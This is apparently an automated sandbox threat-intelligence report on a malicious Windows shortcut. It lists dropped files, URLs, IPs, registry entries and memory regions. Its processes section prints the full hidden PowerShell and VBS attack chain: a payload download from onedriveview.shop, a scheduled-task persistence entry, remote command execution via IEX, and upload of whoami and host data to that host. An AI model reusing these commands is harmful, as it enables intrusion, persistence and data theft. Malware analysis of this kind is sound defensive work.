IOC Report
XnQmVRj5g0.lnk

loading gif

Files

File Path
Type
Category
Malicious
XnQmVRj5g0.lnk
MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=0, ctime=Tue Sep 24 10:15:50 2024, mtime=Tue Sep 24 10:15:50 2024, atime=Tue Sep 24 10:15:50 2024, length=0, window=hide
initial sample
malicious
C:\Users\Public\Libraries\Libraries.vbs
ASCII text, with very long lines (842), with CRLF, LF line terminators
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.chk
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xb339d1f7, page size 16384, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\6689adc7-4295-4e2d-9efe-085383a260a9.tmp
JSON data
modified
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\72c1950f-eb18-4c3d-ba2c-774aecc690ed.tmp
JSON data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
JSON data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF548a55.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
SQLite 3.x database, last written using SQLite version 3040000, file counter 17, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 17
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
SQLite Rollback Journal
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
modified
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7308
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
SQLite Rollback Journal
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\MSI37b66.LOG
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1snjrv25.tcg.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ipq0sg3.jzv.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lo0grxb.q5s.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bitvsf13.5sq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hxe3f4fh.cig.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qb0uk1zn.vci.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qp0qkzjv.bu3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tuqwudok.b45.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\A9166j3yn_165vzyf_5n0.tmp
Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\A91tflhss_165vzyi_5n0.tmp
Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-09-30 09-37-16-665.log
ASCII text, with very long lines (393)
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
ASCII text, with very long lines (393), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\061a807d-5edb-4d55-b1b1-3d2f9a2e08be.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 42290
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\7d2a028f-378d-4a73-8752-a5d6e7c26e87.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\8a17a3e6-f363-4e5c-8d78-736bbb360209.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\bc8e2876-66d4-4613-96d5-ea2d333bb1b3.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\61258363f7d26506.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K2H1ZXRVAT56I9K688BJ.temp
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
There are 44 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;
malicious
C:\Windows\System32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f
malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\sklyar.pdf"
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1588,i,905989185321007172,14586961761040631262,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 6 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://onedriveview.shop/api/values/82980464243822115700/refresh81/
unknown
malicious
https://onedriveview.shop/api/va
unknown
malicious
https://onedriveview.shop/api/val
unknown
malicious
https://onedriveview.shop
unknown
malicious
https://onedriveview.shop/api/values/view/sklyar.txt
unknown
malicious
https://onedriveview.shop/api/value
unknown
malicious
https://onedriveview.shop/api/values/refresh81
unknown
malicious
https://onedriveview.sh
unknown
malicious
http://nuget.org/NuGet.exe
unknown
http://x1.i.lencr.org/
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://crl.microsoft
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
https://onedriveview.shop/api/values/82980464243822115700/refresh81/4869132.txt
unknown
https://contoso.com/Icon
unknown
https://g.live.com/odclientsettings/ProdV21C:
unknown
http://crl.ver)
unknown
https://github.com/Pester/Pester
unknown
https://onedriveview.shop/api/values/82980464243822115700/refresh81/4602718593.txt
unknown
https://www.adobe.co
unknown
https://g.live.com/odclientsettings/Prod1C:
unknown
http://www.microsoft.coi
unknown
http://crl.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://onedriveview.shop
unknown
https://onedriveview.shop/api/values/refresh81X
unknown
https://aka.ms/pscore68
unknown
https://onedriveview.shop/api/values/refresh81tesesX
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://crl.micros
unknown
There are 23 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
188.114.97.3
unknown
European Union
23.41.168.139
unknown
United States
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
There are 10 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1BD0008C000
trusted library allocation
page read and write
malicious
19D57E46000
heap
page read and write
malicious
1DD69175000
heap
page read and write
malicious
12F1C33F000
heap
page read and write
malicious
12F1C381000
heap
page read and write
malicious
19D57E98000
heap
page read and write
malicious
1BD00354000
trusted library allocation
page read and write
malicious
1DD68FB2000
heap
page read and write
malicious
1BD73D2A000
heap
page read and write
malicious
1BD0015B000
trusted library allocation
page read and write
malicious
12F1C39A000
heap
page read and write
malicious
1E22B40C000
trusted library allocation
page read and write
malicious
12F1C465000
heap
page read and write
malicious
1DD68F77000
heap
page read and write
malicious
219E1578000
trusted library allocation
page read and write
malicious
1BD73CA0000
heap
page read and write
malicious
2178F33A000
trusted library allocation
page read and write
malicious
1E22AA70000
trusted library allocation
page read and write
malicious
1E22A735000
trusted library allocation
page read and write
malicious
1DD68F51000
heap
page read and write
malicious
2178DAE1000
trusted library allocation
page read and write
malicious
219E1904000
trusted library allocation
page read and write
malicious
19D580A5000
heap
page read and write
malicious
2178C0C0000
heap
page read and write
malicious
19D57E17000
heap
page read and write
malicious
1E22AABE000
trusted library allocation
page read and write
malicious
217A5FE3000
heap
page read and write
malicious
19D57E7D000
heap
page read and write
malicious
1E22A80C000
trusted library allocation
page read and write
malicious
12F1C346000
heap
page read and write
malicious
1E242BA6000
heap
page read and write
malicious
1E242B60000
heap
page read and write
malicious
1E228A20000
heap
page read and write
malicious
217A600F000
heap
page read and write
malicious
7FFAAC484000
trusted library allocation
page read and write
1BD75746000
heap
page execute and read and write
3D30EFE000
stack
page read and write
219F7C71000
heap
page read and write
7FFAAC536000
trusted library allocation
page read and write
7FFAAC6F0000
trusted library allocation
page read and write
A3517CF000
stack
page read and write
A352A4F000
stack
page read and write
219DDD50000
heap
page read and write
1E2289E5000
heap
page read and write
7FFAAC926000
trusted library allocation
page read and write
7FFAACBE0000
trusted library allocation
page read and write
1E22A420000
heap
page readonly
1FC96454000
heap
page read and write
3D30BFE000
stack
page read and write
2178C103000
heap
page read and write
1E22B182000
trusted library allocation
page read and write
1FC90D02000
heap
page read and write
7FFAAC956000
trusted library allocation
page execute and read and write
3F19F7F000
stack
page read and write
7FFAACAF0000
trusted library allocation
page read and write
1BD004BD000
trusted library allocation
page read and write
7FFAAC546000
trusted library allocation
page read and write
219E1140000
trusted library allocation
page read and write
1E22A6FB000
trusted library allocation
page read and write
1FC90C8F000
heap
page read and write
3D306F9000
stack
page read and write
2AB22FE000
stack
page read and write
12F1C1F0000
heap
page read and write
219F7E00000
heap
page read and write
2178DD0E000
trusted library allocation
page read and write
7FFAAC6B0000
trusted library allocation
page read and write
2178E70E000
trusted library allocation
page read and write
7FFAAC7B0000
trusted library allocation
page read and write
7FFAAC650000
trusted library allocation
page execute and read and write
7FFAAC620000
trusted library allocation
page read and write
7FFAAC7D0000
trusted library allocation
page read and write
4F5E63E000
stack
page read and write
7FFAAC492000
trusted library allocation
page read and write
1FC90C8D000
heap
page read and write
219EFB50000
trusted library allocation
page read and write
219DDD55000
heap
page read and write
7FFAAC6D0000
trusted library allocation
page read and write
1E242BFC000
heap
page read and write
7FFAAC7B0000
trusted library allocation
page read and write
7FFAACA10000
trusted library allocation
page read and write
1FC962C0000
trusted library allocation
page read and write
219DF900000
trusted library allocation
page read and write
2AB25FB000
stack
page read and write
7FFAAC710000
trusted library allocation
page read and write
1FC96290000
trusted library allocation
page read and write
1E2289B0000
heap
page read and write
7FFAACA60000
trusted library allocation
page execute and read and write
49B377E000
unkown
page readonly
2178F1C6000
trusted library allocation
page read and write
A351683000
stack
page read and write
7FFAAC890000
trusted library allocation
page read and write
1E22B214000
trusted library allocation
page read and write
1BD0004B000
trusted library allocation
page read and write
1FC90CA1000
heap
page read and write
217A5FE1000
heap
page read and write
1FC96100000
trusted library allocation
page read and write
2178C010000
heap
page read and write
1FC96290000
trusted library allocation
page read and write
7FFAAC7E0000
trusted library allocation
page read and write
32AC3FE000
stack
page read and write
1BD0056E000
trusted library allocation
page read and write
B56CFBC000
stack
page read and write
1DD68ED0000
heap
page read and write
1E22B312000
trusted library allocation
page read and write
1FC91502000
heap
page read and write
7FFAAC631000
trusted library allocation
page read and write
7FFAAC5A0000
trusted library allocation
page execute and read and write
7FFB1E4D0000
unkown
page read and write
1FC962D0000
trusted library allocation
page read and write
7FFAAC483000
trusted library allocation
page execute and read and write
1BD00001000
trusted library allocation
page read and write
7FFAAC730000
trusted library allocation
page read and write
32ABB3E000
stack
page read and write
4F5E4B6000
stack
page read and write
1FC90CB3000
heap
page read and write
217A5AE6000
heap
page read and write
2178DAD0000
heap
page read and write
19D57D50000
heap
page read and write
1E242C40000
heap
page read and write
1BD757F0000
heap
page read and write
1FC9650A000
heap
page read and write
1E243100000
heap
page read and write
B56D13E000
stack
page read and write
32AC37E000
stack
page read and write
7FFB1E4B0000
unkown
page readonly
1FC964E9000
heap
page read and write
7FFAAC4AB000
trusted library allocation
page read and write
1BD0011B000
trusted library allocation
page read and write
1BD757E3000
trusted library allocation
page read and write
1FC90CAF000
heap
page read and write
1BD75CC0000
heap
page read and write
93C18FB000
stack
page read and write
217A6050000
heap
page read and write
32AC17E000
stack
page read and write
2178C10B000
heap
page read and write
7FFB1E4C6000
unkown
page readonly
219E1151000
trusted library allocation
page read and write
1FC96190000
trusted library allocation
page read and write
7FFB1E4B0000
unkown
page readonly
7FFAAC576000
trusted library allocation
page execute and read and write
7FFB1E4D0000
unkown
page read and write
1FC91A40000
trusted library allocation
page read and write
2178F1EA000
trusted library allocation
page read and write
7FFAAC5B0000
trusted library allocation
page execute and read and write
7FFAAC6E0000
trusted library allocation
page read and write
B56DC43000
stack
page read and write
19D59810000
heap
page read and write
1FC962E0000
trusted library allocation
page read and write
1FC90D17000
heap
page read and write
7FFAAC7E0000
trusted library allocation
page read and write
7FFAAC550000
trusted library allocation
page execute and read and write
219DDC30000
heap
page read and write
49B3B79000
stack
page read and write
7FFAAC760000
trusted library allocation
page read and write
1BD757E0000
trusted library allocation
page read and write
7FFAAC640000
trusted library allocation
page execute and read and write
1BD0010E000
trusted library allocation
page read and write
7FFAACA30000
trusted library allocation
page execute and read and write
7FFB1E4B1000
unkown
page execute read
7FFAAC730000
trusted library allocation
page read and write
7FFAAC641000
trusted library allocation
page read and write
3D307FE000
stack
page read and write
A351F7F000
stack
page read and write
7FFAAC7C0000
trusted library allocation
page read and write
2179DAF1000
trusted library allocation
page read and write
1EC73BB0000
heap
page read and write
7FFAAC492000
trusted library allocation
page read and write
7FFAAC53C000
trusted library allocation
page execute and read and write
B56CF3E000
stack
page read and write
1E22A410000
trusted library allocation
page read and write
2178F753000
trusted library allocation
page read and write
1FC96170000
trusted library allocation
page read and write
1E228A65000
heap
page read and write
7FFB1E4D5000
unkown
page readonly
2178C147000
heap
page read and write
1FC92100000
trusted library allocation
page read and write
12F1C2D0000
heap
page read and write
1FC913D1000
trusted library allocation
page read and write
219F7AE0000
heap
page read and write
12F1C460000
heap
page read and write
1FC90C2B000
heap
page read and write
219F7EE0000
heap
page read and write
219E18BE000
trusted library allocation
page read and write
1FC90CB3000
heap
page read and write
7FFAAC720000
trusted library allocation
page read and write
1EC73F04000
heap
page read and write
7FFAAC7C0000
trusted library allocation
page read and write
1FC964B0000
heap
page read and write
7FFB1E4C6000
unkown
page readonly
7FFB1E4C6000
unkown
page readonly
2178C000000
heap
page read and write
7FFAAC4AB000
trusted library allocation
page read and write
B56D23E000
stack
page read and write
1FC90CFF000
heap
page read and write
219DF910000
heap
page readonly
7FFAAC7A0000
trusted library allocation
page read and write
32ACE4E000
stack
page read and write
1BD004DC000
trusted library allocation
page read and write
32ABF7E000
stack
page read and write
7FFAAC6D0000
trusted library allocation
page read and write
1FC96500000
heap
page read and write
219DDD40000
trusted library allocation
page read and write
7FFAAC710000
trusted library allocation
page read and write
1BD73C10000
heap
page read and write
1FC91C80000
trusted library allocation
page read and write
219DDC0D000
heap
page read and write
7FFAAC672000
trusted library allocation
page read and write
2178C050000
heap
page read and write
1E22A3D0000
heap
page read and write
7FFAAC88B000
trusted library allocation
page read and write
1E242BB3000
heap
page read and write
1FC90CA3000
heap
page read and write
4F5E17B000
stack
page read and write
1BD0007D000
trusted library allocation
page read and write
219F7F5C000
heap
page read and write
1E22B210000
trusted library allocation
page read and write
219DDAC0000
heap
page read and write
A351DFE000
stack
page read and write
1FC964D2000
heap
page read and write
1FC96422000
heap
page read and write
7FFAAC800000
trusted library allocation
page read and write
219F7DD7000
heap
page execute and read and write
A35207C000
stack
page read and write
219F7CEA000
heap
page read and write
7FFB1E4D2000
unkown
page readonly
1E22A4A0000
trusted library allocation
page read and write
219F7CF0000
heap
page execute and read and write
7FFAAC87D000
trusted library allocation
page execute and read and write
219DDBC5000
heap
page read and write
219EFDCA000
trusted library allocation
page read and write
1FC967F0000
trusted library allocation
page read and write
1FC96330000
remote allocation
page read and write
7FFB1E4D2000
unkown
page readonly
1FC96270000
trusted library allocation
page read and write
7FFAACAE0000
trusted library allocation
page read and write
1E22A3D5000
heap
page read and write
1FC91504000
heap
page read and write
217A6210000
heap
page read and write
32AC27D000
stack
page read and write
1BD75630000
trusted library allocation
page read and write
1BD73C55000
heap
page read and write
1FC91513000
heap
page read and write
1BD76190000
heap
page read and write
7FFB1E4D2000
unkown
page readonly
217A5FA2000
heap
page read and write
1FC961C0000
trusted library allocation
page read and write
1FC96330000
remote allocation
page read and write
